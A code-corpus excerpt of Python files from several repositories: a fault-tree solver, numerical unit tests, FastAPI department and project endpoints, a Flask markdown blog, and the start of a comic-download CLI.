def returnPostProcessorInterface(Type,caller):
"""
This function returns interfaced post-processors interface
@ In, Type, string, type of Interfaced PostProcessor to run
@ In, caller, instance of the PostProcessor class
@ Out, __interFaceDict[Type](), dict, interfaced PostProcessor dictionary
"""
if Type not in knownTypes():
caller.raiseAnError(NameError,'"%s" type unrecognized:' %__base,Type)
return __interFaceDict[Type](caller.messageHandler)
```
#### File: framework/PostProcessors/FTStructure.py
```python
from __future__ import division, print_function , unicode_literals, absolute_import
#Internal Modules---------------------------------------------------------------
import MessageHandler
from utils import utils
from .FTGate import FTGate
from utils import xmlUtils as xmlU
#Internal Modules End-----------------------------------------------------------
#External Modules---------------------------------------------------------------
import numpy as np
import xml.etree.ElementTree as ET
import copy
import itertools
from collections import OrderedDict
#External Modules End-----------------------------------------------------------
class FTStructure(object):
"""
This is the base class of the FT structure which actually handles FT structures which is used by the FTimporter and the FTmodel
"""
def __init__(self, inputs, topEventID):
"""
This method executes the postprocessor action.
@ In, inputs, list, list of file objects
@ Out, outcome, dict, dict containing the processed FT
"""
self.basicEvents = [] # List of Basic events of the FT
self.houseEvents = {} # List of House events of the FT
self.gateList = {} # Dict of Gates of the FT
self.gateID = [] # list of Gates name
self.topEventID = topEventID # ID of the FT output
for fileID in inputs:
faultTree = ET.parse(fileID.getPath() + fileID.getFilename())
faultTree = xmlU.findAllRecursive(faultTree,'opsa-mef')
for gate in xmlU.findAllRecursive(faultTree[0], 'define-gate'):
ftGate = FTGate(gate)
self.gateList[gate.get('name')] = ftGate
self.gateID.append(gate.get('name'))
for basicEvent in xmlU.findAllRecursive(faultTree[0], 'basic-event'):
self.basicEvents.append(basicEvent.get('name'))
for houseEvent in xmlU.findAllRecursive(faultTree[0], 'define-house-event'):
value = houseEvent.find('constant').get('value')
if value in ['True','true']:
value = 1.
elif value in ['False','false']:
value = 0.
else:
raise IOError('FTImporterPostProcessor Post-Processor ' + self.name + ': house event ' + str(basicEvent.get('name')) + ' has a not boolean value (True or False)')
self.houseEvents[houseEvent.get('name')] = value
if not self.topEventID in self.gateID:
raise IOError('FTImporterPostProcessor: specified top event ' + str(self.topEventID) + ' is not contained in the fault-tree; available gates are: ' + str(self.gateID))
def returnDict(self):
"""
This method calculates all possible input combinations and the corresponding output values
@ In, None
@ Out, outcome, dict, dictionary containing
"""
self.FTsolver()
outcome = self.constructData()
return outcome
def FTsolver(self):
"""
This method determines the ordered sequence of gates to compute in order to solve the full FT.
The determined ordered sequence is stored in self.gateSequence.
@ In, None
@ Out, None
"""
self.gateSequence = []
availBasicEvents = copy.deepcopy(self.basicEvents)
availBasicEvents = availBasicEvents + list(self.houseEvents.keys())
counter = 0
while True:
complete=False
for gate in self.gateList.keys():
if set(self.gateList[gate].returnArguments()) <= set(availBasicEvents):
self.gateSequence.append(gate)
availBasicEvents.append(gate)
if set(availBasicEvents) == set(itertools.chain(self.basicEvents,self.gateID,self.houseEvents.keys())):
complete=True
break
if counter > len(self.gateList.keys()):
raise IOError('FTImporterPostProcessor Post-Processor ' + self.name + ': the provided FT cannot be computed')
counter += 1
if complete:
break
def evaluateFT(self,combination):
"""
This method determines the outcome of the FT given a set of basic-event values
@ In, combination, dict, dictionary containing values for all basic-events
@ Out, values, dict, dictionary containing calculated values for all gates
"""
values = {}
for gate in self.gateSequence:
values[gate] = self.gateList[gate].evaluate(combination)
combination[gate] = values[gate]
return values
def constructData(self):
"""
This method determines the outcome of the FT given a set of basic-event values
@ In, None
@ Out, outcome, dict, dictionary containing calculated values for all basic-events and the Top-event
"""
combinations = list(itertools.product([0,1],repeat=len(self.basicEvents)))
outcome={}
outcome={key:np.zeros(len(combinations)) for key in self.basicEvents}
outcome[self.topEventID] = np.zeros(len(combinations))
for index,combination in enumerate(combinations):
combinationDict = {key: combination[index] for index,key in enumerate(self.basicEvents)}
for houseEvent in self.houseEvents.keys():
combinationDict[houseEvent] = self.houseEvents[houseEvent]
out = self.evaluateFT(combinationDict)
for key in self.basicEvents:
outcome[key][index]=float(combinationDict[key])
outcome[self.topEventID][index] = out[self.topEventID]
return outcome
```
#### File: unit_tests/TSA/testFourier.py
```python
import os
import sys
import copy
import numpy as np
# add RAVEN to path
frameworkDir = os.path.abspath(os.path.join(*([os.path.dirname(__file__)] + [os.pardir]*4 + ['framework'])))
if frameworkDir not in sys.path:
sys.path.append(frameworkDir)
from utils.utils import find_crow
find_crow(frameworkDir)
from utils import xmlUtils
from TSA import Fourier
plot = False
print('Module undergoing testing:')
print(Fourier)
print('')
results = {"pass":0,"fail":0}
def checkFloat(comment, value, expected, tol=1e-10, update=True):
"""
This method is aimed to compare two floats given a certain tolerance
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, tol, float, optional, the tolerance
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if same
"""
if np.isnan(value) and np.isnan(expected):
res = True
elif np.isnan(value) or np.isnan(expected):
res = False
else:
res = abs(value - expected) <= tol
if update:
if not res:
print("checking float",comment,'|',value,"!=",expected)
results["fail"] += 1
else:
results["pass"] += 1
return res
def checkTrue(comment, res, update=True):
"""
This method is a pass-through for consistency and updating
@ In, comment, string, a comment printed out if it fails
@ In, res, bool, the tested value
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if test
"""
if update:
if res:
results["pass"] += 1
else:
print("checking bool",comment,'|',res,'is not True!')
results["fail"] += 1
return res
def checkSame(comment, value, expected, update=True):
"""
This method is aimed to compare two identical things
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if same
"""
res = value == expected
if update:
if res:
results["pass"] += 1
else:
print("checking string",comment,'|',value,"!=",expected)
results["fail"] += 1
return res
def checkArray(comment, first, second, dtype, tol=1e-10, update=True):
"""
This method is aimed to compare two arrays
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, tol, float, optional, the tolerance
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if same
"""
res = True
if len(first) != len(second):
res = False
print("checking answer",comment,'|','lengths do not match:',len(first),len(second))
else:
for i in range(len(first)):
if dtype == float:
pres = checkFloat('',first[i],second[i],tol,update=False)
elif dtype in (str,unicode):
pres = checkSame('',first[i],second[i],update=False)
if not pres:
print('checking array',comment,'|','entry "{}" does not match: {} != {}'.format(i,first[i],second[i]))
res = False
if update:
if res:
results["pass"] += 1
else:
results["fail"] += 1
return res
def checkNone(comment, entry, update=True):
"""
Checks if entry is None.
@ In, comment, string, a comment printed out if it fails
@ In, entry, object, to test if against None
@ In, update, bool, optional, if False then don't update results counter
@ Out, res, bool, True if None
"""
res = entry is None
if update:
if res:
results["pass"] += 1
else:
print("checking answer",comment,'|','"{}" is not None!'.format(entry))
results["fail"] += 1
def checkFails(comment, errstr, function, update=True, args=None, kwargs=None):
"""
Checks if expected error occurs
@ In, comment, string, a comment printed out if it fails
@ In, errstr, str, expected fail message
@ In, function, method, method to run to test for failure
@ In, update, bool, optional, if False then don't update results counter
@ In, args, list, arguments to pass to function
@ In, kwargs, dict, keyword arguments to pass to function
@ Out, res, bool, True if failed as expected
"""
print('Error testing ...')
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
function(*args,**kwargs)
res = False
msg = 'Function call did not error!'
except Exception as e:
res = checkSame('',e.args[0],errstr,update=False)
if not res:
msg = 'Unexpected error message. \n Received: "{}"\n Expected: "{}"'.format(e.args[0],errstr)
if update:
if res:
results["pass"] += 1
print(' ... end Error testing (PASSED)')
else:
print("checking error",comment,'|',msg)
results["fail"] += 1
print(' ... end Error testing (FAILED)')
print('')
return res
######################################
# CONSTRUCTION #
######################################
def createFourierXML(targets, periods):
xml = xmlUtils.newNode('Fourier', attrib={'target':','.join(targets)})
xml.append(xmlUtils.newNode('periods', text=','.join(str(k) for k in periods)))
return xml
def createFromXML(xml):
fourier = Fourier()
inputSpec = Fourier.getInputSpecification()()
inputSpec.parseNode(xml)
fourier.handleInput(inputSpec)
return fourier
def createFourier(targets, periods):
xml = createFourierXML(targets, periods)
fourier = createFromXML(xml)
return fourier
def createFourierSignal(amps, periods, phases, pivot, intercept=0, plot=False):
if plot:
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
signal = np.zeros(len(pivot)) + intercept
for k, period in enumerate(periods):
new = amps[k] * np.sin(2 * np.pi / period * pivot + phases[k])
if plot:
ax.plot(pivot, new, ':')
signal += new
if plot:
ax.plot(pivot, signal, 'k-')
plt.show()
return signal
###################
# Simple #
###################
# generate signal
targets = ['A', 'B', 'C']
pivot = np.arange(100) / 10.
periods = [2, 5, 10]
amps = [0.5, 1, 2]
phasesA = [0, np.pi, 0]
signalA = createFourierSignal(amps, periods, phasesA, pivot, plot=plot)
phasesB = [np.pi, 0, np.pi/4]
signalB = createFourierSignal(amps, periods, phasesB, pivot, plot=plot)
phasesC = [np.pi, np.pi/4, -np.pi/4]
interceptC = 2
signalC = createFourierSignal(amps, periods, phasesC, pivot, intercept=interceptC, plot=plot)
signals = np.zeros((len(pivot), 3))
signals[:, 0] = signalA
signals[:, 1] = signalB
signals[:, 2] = signalC
fourier = createFourier(targets, periods)
params = fourier.characterize(signals, pivot, targets)
# intercepts
checkFloat('Signal A intercept', params['A']['intercept'], 0)
checkFloat('Signal B intercept', params['B']['intercept'], 0)
checkFloat('Signal C intercept', params['C']['intercept'], interceptC)
# amplitudes
checkFloat('Signal A period 0 amplitude', params['A']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal A period 1 amplitude', params['A']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal A period 2 amplitude', params['A']['coeffs'][periods[2]]['amplitude'], amps[2])
checkFloat('Signal B period 0 amplitude', params['B']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal B period 1 amplitude', params['B']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal B period 2 amplitude', params['B']['coeffs'][periods[2]]['amplitude'], amps[2])
checkFloat('Signal C period 0 amplitude', params['C']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal C period 1 amplitude', params['C']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal C period 2 amplitude', params['C']['coeffs'][periods[2]]['amplitude'], amps[2])
# phases
# check absolute value of phase pi since -pi and pi are often converged on separately
checkFloat('Signal A period 0 phase', params['A']['coeffs'][periods[0]]['phase'] , phasesA[0])
checkFloat('Signal A period 1 phase', abs(params['A']['coeffs'][periods[1]]['phase']), phasesA[1])
checkFloat('Signal A period 2 phase', params['A']['coeffs'][periods[2]]['phase'] , phasesA[2])
checkFloat('Signal B period 0 phase', abs(params['B']['coeffs'][periods[0]]['phase']), phasesB[0])
checkFloat('Signal B period 1 phase', params['B']['coeffs'][periods[1]]['phase'] , phasesB[1])
checkFloat('Signal B period 2 phase', params['B']['coeffs'][periods[2]]['phase'] , phasesB[2])
checkFloat('Signal C period 0 phase', abs(params['C']['coeffs'][periods[0]]['phase']), phasesC[0])
checkFloat('Signal C period 1 phase', params['C']['coeffs'][periods[1]]['phase'] , phasesC[1])
checkFloat('Signal C period 2 phase', params['C']['coeffs'][periods[2]]['phase'] , phasesC[2])
# recreate signals
res = fourier.generate(params, pivot, None)
for tg, target in enumerate(targets):
checkArray(f'Signal {target} replication', res[:, tg], signals[:, tg], float)
##### now redo with non-simultaneous fitting
params = fourier.characterize(signals, pivot, targets, simultFit=False)
# intercepts
checkFloat('Signal A intercept', params['A']['intercept'], 0)
checkFloat('Signal B intercept', params['B']['intercept'], 0)
checkFloat('Signal C intercept', params['C']['intercept'], interceptC)
# amplitudes
checkFloat('Signal A period 0 amplitude', params['A']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal A period 1 amplitude', params['A']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal A period 2 amplitude', params['A']['coeffs'][periods[2]]['amplitude'], amps[2])
checkFloat('Signal B period 0 amplitude', params['B']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal B period 1 amplitude', params['B']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal B period 2 amplitude', params['B']['coeffs'][periods[2]]['amplitude'], amps[2])
checkFloat('Signal C period 0 amplitude', params['C']['coeffs'][periods[0]]['amplitude'], amps[0])
checkFloat('Signal C period 1 amplitude', params['C']['coeffs'][periods[1]]['amplitude'], amps[1])
checkFloat('Signal C period 2 amplitude', params['C']['coeffs'][periods[2]]['amplitude'], amps[2])
# phases
# check absolute value of phase pi since -pi and pi are often converged on separately
checkFloat('Signal A period 0 phase', params['A']['coeffs'][periods[0]]['phase'] , phasesA[0])
checkFloat('Signal A period 1 phase', abs(params['A']['coeffs'][periods[1]]['phase']), phasesA[1])
checkFloat('Signal A period 2 phase', params['A']['coeffs'][periods[2]]['phase'] , phasesA[2])
checkFloat('Signal B period 0 phase', abs(params['B']['coeffs'][periods[0]]['phase']), phasesB[0])
checkFloat('Signal B period 1 phase', params['B']['coeffs'][periods[1]]['phase'] , phasesB[1])
checkFloat('Signal B period 2 phase', params['B']['coeffs'][periods[2]]['phase'] , phasesB[2])
checkFloat('Signal C period 0 phase', abs(params['C']['coeffs'][periods[0]]['phase']), phasesC[0])
checkFloat('Signal C period 1 phase', params['C']['coeffs'][periods[1]]['phase'] , phasesC[1])
checkFloat('Signal C period 2 phase', params['C']['coeffs'][periods[2]]['phase'] , phasesC[2])
# recreate signals
res = fourier.generate(params, pivot, None)
for tg, target in enumerate(targets):
checkArray(f'Signal {target} replication', res[:, tg], signals[:, tg], float)
# check residual
# -> generate random noise to add to signal, then check it is returned in residual
r = np.random.rand(pivot.size, len(targets))
new = r + signals
res = fourier.getResidual(new, params, pivot, None)
for tg, target in enumerate(targets):
checkArray(f'Signal {target} residual', res[:, tg], r[:, tg], float)
print(results)
sys.exit(results["fail"])
"""
<TestInfo>
<name>framework.unit_tests.TSA.Fourier</name>
<author>talbpaul</author>
<created>2021-01-05</created>
<classesTested>TSA.Fourier</classesTested>
<description>
This test is a Unit Test for the Fourier TimeSeriesAnalyzer classes.
</description>
</TestInfo>
"""
```
#### File: unit_tests/utils/testTreeStructure.py
```python
from __future__ import division, print_function, unicode_literals, absolute_import
import warnings
warnings.simplefilter('default',DeprecationWarning)
import os,sys
import numpy as np
frameworkDir = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,os.pardir,os.pardir,'framework'))
print('framework:',frameworkDir)
sys.path.append(frameworkDir)
import MessageHandler
mh = MessageHandler.MessageHandler()
mh.initialize({'verbosity':'debug'})
from utils import TreeStructure as TS
results = {"pass":0,"fail":0}
#type comparison
def checkAnswer(comment,value,expected,tol=1e-10,updateResults=True):
"""
This method is aimed to compare two floats given a certain tolerance
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, tol, float, optional, the tolerance
@ In, updateResults, bool, optional, if True updates global results
@ Out, None
"""
if abs(value - expected) > tol:
print("checking answer",comment,value,"!=",expected)
if updateResults:
results["fail"] += 1
return False
else:
if updateResults:
results["pass"] += 1
return True
def checkSame(comment,value,expected,updateResults=True):
"""
This method is aimed to compare two floats given a certain tolerance
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, updateResults, bool, optional, if True updates global results
@ Out, None
"""
if value != expected:
print("checking answer",comment,value,"!=",expected)
if updateResults:
results["fail"] += 1
return False
else:
if updateResults:
results["pass"] += 1
return True
def checkArray(comment,check,expected,tol=1e-10):
"""
This method is aimed to compare two arrays of floats given a certain tolerance
@ In, comment, string, a comment printed out if it fails
@ In, check, list, the value to compare
@ In, expected, list, the expected value
@ In, tol, float, optional, the tolerance
@ Out, None
"""
same=True
if len(check) != len(expected):
same=False
else:
for i in range(len(check)):
same = same*checkAnswer(comment+'[%i]'%i,check[i],expected[i],tol,False)
if not same:
print("checking array",comment,"did not match!")
results['fail']+=1
return False
else:
results['pass']+=1
return True
def checkType(comment,value,expected,updateResults=True):
"""
This method compares the data type of two values
@ In, comment, string, a comment printed out if it fails
@ In, value, float, the value to compare
@ In, expected, float, the expected value
@ In, updateResults, bool, optional, if True updates global results
@ Out, None
"""
if type(value) != type(expected):
print("checking type",comment,value,'|',type(value),"!=",expected,'|',type(expected))
if updateResults:
results["fail"] += 1
return False
else:
if updateResults:
results["pass"] += 1
return True
##############
# Node Tests #
##############
# TODO not complete!
#test equivalency (eq, neq, hash)
## test all same are same
a = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':1,'attrib2':'2'},text='sampleText')
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':1,'attrib2':'2'},text='sampleText')
checkSame('Equivalency of nodes ==:',a==b,True)
checkSame('Equivalency of nodes !=:',a!=b,False)
## test different tag
b = TS.HierarchicalNode(mh,'diffTag',valuesIn={'attrib1':1,'attrib2':'2'},text='sampleText')
checkSame('Inequivalent tag ==:',a==b,False)
checkSame('Inequivalent tag !=:',a!=b,True)
## test different attribute name
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib3':1,'attrib2':'2'},text='sampleText')
checkSame('Inequivalent value name ==:',a==b,False)
checkSame('Inequivalent value name !=:',a!=b,True)
## test different attribute value
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':3,'attrib2':'2'},text='sampleText')
checkSame('Inequivalent value name ==:',a==b,False)
checkSame('Inequivalent value name !=:',a!=b,True)
## test different text value
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':3,'attrib2':'2'},text='diffText')
checkSame('Inequivalent value name ==:',a==b,False)
checkSame('Inequivalent value name !=:',a!=b,True)
## test equivalent, only tags
a = TS.HierarchicalNode(mh,'rightTag')
b = TS.HierarchicalNode(mh,'rightTag')
checkSame('Equivalency only tag ==:',a==b,True)
checkSame('Equivalency only tag !=:',a!=b,False)
## test equivalent, only values
a = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':1,'attrib2':'2'})
b = TS.HierarchicalNode(mh,'rightTag',valuesIn={'attrib1':1,'attrib2':'2'})
checkSame('Equivalency only values ==:',a==b,True)
checkSame('Equivalency only values !=:',a!=b,False)
## test equivalent, only text
a = TS.HierarchicalNode(mh,'rightTag',text='sampleText')
b = TS.HierarchicalNode(mh,'rightTag',text='sampleText')
checkSame('Equivalency only text ==:',a==b,True)
checkSame('Equivalency only text !=:',a!=b,False)
##############
# Tree Tests #
##############
# TODO
##################
# Metadata Tests #
##################
# construction
static = TS.StaticMetadataTree(mh,'myStaticData')
dynamic = TS.DynamicMetadataTree(mh,'myDynamicData','timeParam')
# test "dynamic" attribute set correctly
checkSame('Static "dynamic" property correctly set:',static.getrootnode().get('dynamic'),'False')
checkSame('Dynamic "dynamic" property correctly set:',dynamic.getrootnode().get('dynamic'),'True')
# test message handler works (implicit test, no error means success)
static.raiseADebug('Debug message in Static successful!')
dynamic.raiseADebug('Debug message in Dynamic successful!')
results['pass']+=2
#test adding scalar entries (implicit test, no error means success)
static.addScalar('myTarget','myMetric',3.14159)
results['pass']+=1
dynamic.addScalar('myTarget','myMetric',3.14159,pivotVal=0.1) #pivot value as float
results['pass']+=1
dynamic.addScalar('myTarget','myMetric',299792358,pivotVal='0.2') #pivot value as string
results['pass']+=1
#test finding pivotNode (dynamic only)
a = TS.HierarchicalNode(mh,'timeParam',valuesIn={'value':0.2})
b = dynamic._findPivot(dynamic.getrootnode(),0.2)
checkSame('Finding pivot node:',b,a)
#test finding targetNode
## static
a = TS.HierarchicalNode(mh,'myTarget')
b = static._findTarget(static.getrootnode(),'myTarget')
checkSame('Finding target (static):',b,a)
## dynamic
a = TS.HierarchicalNode(mh,'myTarget')
c = dynamic._findTarget(dynamic.getrootnode(),'myTarget',0.2)
checkSame('Finding target (dynamic):',c,a)
#test values recorded
checkAnswer('Recorded data (static):',b.findBranch('myMetric').text,3.14159)
c = dynamic._findTarget(dynamic.getrootnode(),'myTarget',0.1)
checkAnswer('Recorded data (dynamic 1):',c.findBranch('myMetric').text,3.14159)
c = dynamic._findTarget(dynamic.getrootnode(),'myTarget',0.2)
checkAnswer('Recorded data (dynamic 2):',c.findBranch('myMetric').text,299792358)
print('{0}ed: {2}, {1}ed: {3}'.format(*(list(str(r) for r in results.keys())+list(results.values()))))
sys.exit(results["fail"])
"""
<TestInfo>
<name>framework.treeStructure</name>
<author>talbpaul</author>
<created>2016-11-01</created>
<classesTested>utils.TreeStructure</classesTested>
<description>
This test performs Unit Tests for the TreeStructure classes
It cannot be considered part of the active code but of the regression test system
</description>
<revisions>
<revision author="talbpaul" date="2016-11-08">Relocated utils tests</revision>
<revision author="alfoa" date="2017-01-21">Adding this test description.</revision>
</revisions>
</TestInfo>
"""
``` |
{
"source": "jiazhuangle/auth-server",
"score": 2
} |
#### File: api_v1/endpoints/departments.py
```python
from typing import Any, List
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi.encoders import jsonable_encoder
from pydantic.networks import EmailStr
from sqlalchemy.orm import Session
from app import crud, models, schemas
from app.api import deps
from app.core.config import settings
router = APIRouter()
@router.get("/", response_model=List[schemas.Department])
def read_departments(
db: Session = Depends(deps.get_db),
skip: int = 0,
limit: int = 100,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Retrieve DEPARTMENTS.
"""
if current_user.is_superuser:
departments = crud.department.get_multi(db, skip=skip, limit=limit)
return departments
else:
raise HTTPException(
status_code=400,
detail="The user doesn't have enough privileges.",
)
@router.post('/', response_model=schemas.Department)
def create_department(
*,
db: Session = Depends(deps.get_db),
department_in: schemas.DepartmentCreate,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
'''
CREATE a department.
'''
if current_user.is_superuser:
return crud.department.create(db, obj_in=department_in)
else:
raise HTTPException(
status_code=400,
detail="The user doesn't have enough privileges.",
)
@router.get("/{department_id}", response_model=schemas.Department)
def read_department_by_id(
department_id: int,
current_user: models.User = Depends(deps.get_current_active_user),
db: Session = Depends(deps.get_db),
) -> Any:
"""
Get a specific department by id.
"""
department = crud.department.get(db, id=department_id)
return department
@router.put("/{department_id}", response_model=schemas.Department)
def update_department(
*,
db: Session = Depends(deps.get_db),
department_id: int,
department_in: schemas.DepartmentUpdate,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Update a user.
"""
department = crud.department.get(db, id=department_id)
if not department:
raise HTTPException(
status_code=404,
detail="The department does not exist in the system",
)
user = crud.department.update(db, db_obj=department, obj_in=department_in)
return user
```
#### File: api_v1/endpoints/projects.py
```python
from typing import Any, List,Union
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi.encoders import jsonable_encoder
from pydantic.networks import EmailStr
from sqlalchemy.orm import Session
from app import crud, models, schemas
from app.api import deps
from app.core.config import settings
router = APIRouter()
@router.get("/", response_model= List[schemas.Project], response_model_exclude=["user_list"])
def read_projects(
db: Session = Depends(deps.get_db),
skip: int = 0,
limit: int = 100,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Retrieve projects.
"""
if current_user.is_superuser:
projects = crud.project.get_multi(db, skip=skip, limit=limit)
return projects
else:
raise HTTPException(
status_code=400,
detail="The user doesn't have enough privileges.",
)
@router.post('/', response_model=schemas.Project)
def create_department(
*,
db: Session = Depends(deps.get_db),
project_in: schemas.ProjectCreate,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
'''
CREATE a project.
'''
if current_user.is_superuser:
return crud.project.create(db, obj_in=project_in)
else:
raise HTTPException(
status_code=400,
detail="The user doesn't have enough privileges.",
)
@router.put("/{project_id}", response_model=schemas.Project)
def update_project(
project_id: int,
project_in: schemas.ProjectUpdate,
current_user: models.User = Depends(deps.get_current_active_user),
db: Session = Depends(deps.get_db),
) -> Any:
"""
Get a specific user by id.
"""
project = crud.project.get(db, id=project_id)
if not current_user.is_superuser:
raise HTTPException(
status_code=400, detail="The user doesn't have enough privileges"
)
project = crud.project.update(db,db_obj=project,obj_in=project_in)
return project
```
#### File: app/crud/crud_department.py
```python
from typing import Any, Dict, Optional, Union
from sqlalchemy.orm import Session
from app.core.security import get_password_hash, verify_password
from app.crud.base import CRUDBase
from app.models import Department
from app.schemas.department_schemas import DepartmentCreate, DepartmentUpdate
class CRUDDepartment(CRUDBase[Department,DepartmentCreate,DepartmentUpdate]):
def get_by_id(self,db:Session,*,id:int)->Optional[Department]:
return db.query(Department).filter_by(id=id).first()
def create(self, db: Session, *, obj_in: DepartmentCreate) -> Department:
return super().create(db,obj_in=obj_in)
def update(
self,
db: Session,
*,
db_obj: Department,
obj_in: Union[DepartmentUpdate, Dict[str, Any]]
) -> Department:
if isinstance(obj_in,dict):
update_data=obj_in
else:
update_data=obj_in.dict(exclude_unset=True)
return super().update(db,db_obj=db_obj,obj_in=update_data)
department=CRUDDepartment(Department)
``` |
{
"source": "jiazhuangle/goalkeeper",
"score": 2
} |
#### File: app/api/routes.py
```python
import base64
from flask import jsonify,g
from app.api import bp
from app.api.errors import bad_request
from app.api.auth import token_auth
from app.models import UserData
@bp.route('/user', methods=['GET'])
@token_auth.login_required
def get_user():
return jsonify(g.current_user.to_dict())
```
#### File: jiazhuangle/goalkeeper/goalkeeper.py
```python
from app import create_app, db
from app.models import User, UserData
app = create_app()
@app.shell_context_processor
def make_shell_context():
return {'db': db, 'User': User, 'UserData': UserData }
``` |
{
"source": "jiazifa/blog",
"score": 2
} |
#### File: blog/app/views.py
```python
from typing import Optional, Any, Dict, List, Tuple
import os
from flask import (
jsonify,
request,
Flask,
g,
current_app,
render_template,
send_from_directory,
redirect,
url_for,
flash,
)
import mistune
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import HtmlFormatter
from flask.helpers import get_env
from flask.views import MethodView
from app import helpers
logger = helpers.get_logger(__name__)
def block_code(text, lang, inlinestyles=False, linenos=False):
if not lang:
text = text.strip()
return u'<pre><code>%s</code></pre>\n' % mistune.escape(text)
try:
lexer = get_lexer_by_name(lang, stripall=True)
formatter = HtmlFormatter(
noclasses=inlinestyles, linenos=linenos
)
code = highlight(text, lexer, formatter)
if linenos:
return '<div class="highlight">%s</div>\n' % code
return code
except:
return '<pre class="%s"><code>%s</code></pre>\n' % (
lang, mistune.escape(text)
)
class HighlightMixin(object):
def block_code(self, text, lang):
# renderer has an options
inlinestyles = self.options.get('inlinestyles')
return block_code(text, lang, inlinestyles, False)
class TocRenderer(HighlightMixin, mistune.Renderer):
pass
def load_all_articles(dir_path: str) -> List[str]:
all_files = os.listdir(dir_path)
display_files = filter(lambda n: not n.startswith('.'), all_files)
whole_paths = list(map(lambda n: os.path.join(dir_path, n), display_files))
return whole_paths
def load_article_content(path: str) -> str:
with open(path) as f:
return f.read()
def render_content_to_markdown(content: str) -> str:
renderer = TocRenderer(linenos=True, inlinestyles=False)
markdown = mistune.Markdown(escape=True, renderer=renderer)
return markdown(content)
def article_list() -> List[Dict[str, str]]:
if "site" not in g:
return jsonify({'e': 'no site'})
dir_path = g.site['target_dir']
whole_paths = load_all_articles(dir_path)
payload: List[Dict[str, str]] = []
for path in whole_paths:
filename = path.split('/')[-1].split('.')[0]
title = filename.split('-')[-1]
publish_date = "-".join(filename.split('-')[:-1])
payload.append(
{
'path': path,
'filename': filename,
'title': title,
'description': publish_date,
'last_modified': '昨天'
}
)
return payload
def favicon_ico():
return current_app.send_static_file("images/favicon.ico")
def index():
payload = article_list()
return render_template("index.html", title='tree', payload=payload)
def article(title: str):
a_list = article_list()
ta = list(filter(lambda t: t['title'] == title, a_list))[0]
content = load_article_content(ta['path'])
paylaod = render_content_to_markdown(content)
return render_template('detail.html', title=title, post={'title': title, 'content': paylaod})
def not_found(error: Exception) -> Tuple[str, int]:
return render_template("404.html"), 404
def fetch_target_dir() -> Optional[str]:
return os.getenv("TARGET_DIR")
def load_site_config():
if "site" not in g:
target = fetch_target_dir()
if not target:
return
g.site = {
'target_dir': target,
'title': 'Tree',
}
def about_me():
return render_template("aboutme.html")
def init_app(app: Flask) -> None:
app.add_url_rule("/", view_func=index, methods=["GET"])
app.add_url_rule("/article/<string:title>", view_func=article, methods=["GET"])
app.add_url_rule("/favicon.ico", view_func=favicon_ico)
app.add_url_rule("/aboutme", view_func=about_me, methods=["GET"])
app.register_error_handler(404, not_found)
app.before_request(load_site_config)
``` |
{
"source": "jiazifa/CartoonExtractor",
"score": 3
} |
#### File: src/cartoon/cli.py
```python
import os
import io
import re
import sys
import time
import json
import argparse
import logging
from importlib import import_module
from argparse import ArgumentParser
from typing import Tuple, Any, Dict, List, Callable, Optional, Union
from urllib import parse, request, error
import cartoon
from cartoon.common import *
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding="utf-8")
SITES = {
"fzdm": "fzdm",
"jav468": "jav",
"kuaikanmanhua": "kkmh",
"meizi.info": "mz",
"mzitu": "mztu",
"177pic": "177pic"
}
# global var
prefer_list: bool = False
def url_to_module(url: str) -> Tuple[Any, str]:
"""
find module by url, we match with dic SITES
Return: module name if matched
"""
r = parse.urlparse(url)
domain = r.netloc
safe_starts = ["www."]
for start in safe_starts:
if domain.startswith(start): domain = domain.replace(start, "")
safe_ends: List[str] = [".com", ".cn", ".org", ".info"]
for ends in safe_ends:
if domain.endswith(ends): domain = domain.replace(ends, "")
k = domain
if k in SITES:
return (import_module(".".join(["cartoon", "extractors", SITES[k]])), url)
else:
return (import_module(".".join(["cartoon", "extractors", "universal"])), url)
def any_download(url: str, **kwargs):
"""
dowload a single html url
use module if matched, otherwise we use universal downloader
"""
m, url = url_to_module(url)
m.prefer_download(url)
def any_download_playlist(url: str, **kwargs):
"""
dowload a list html url
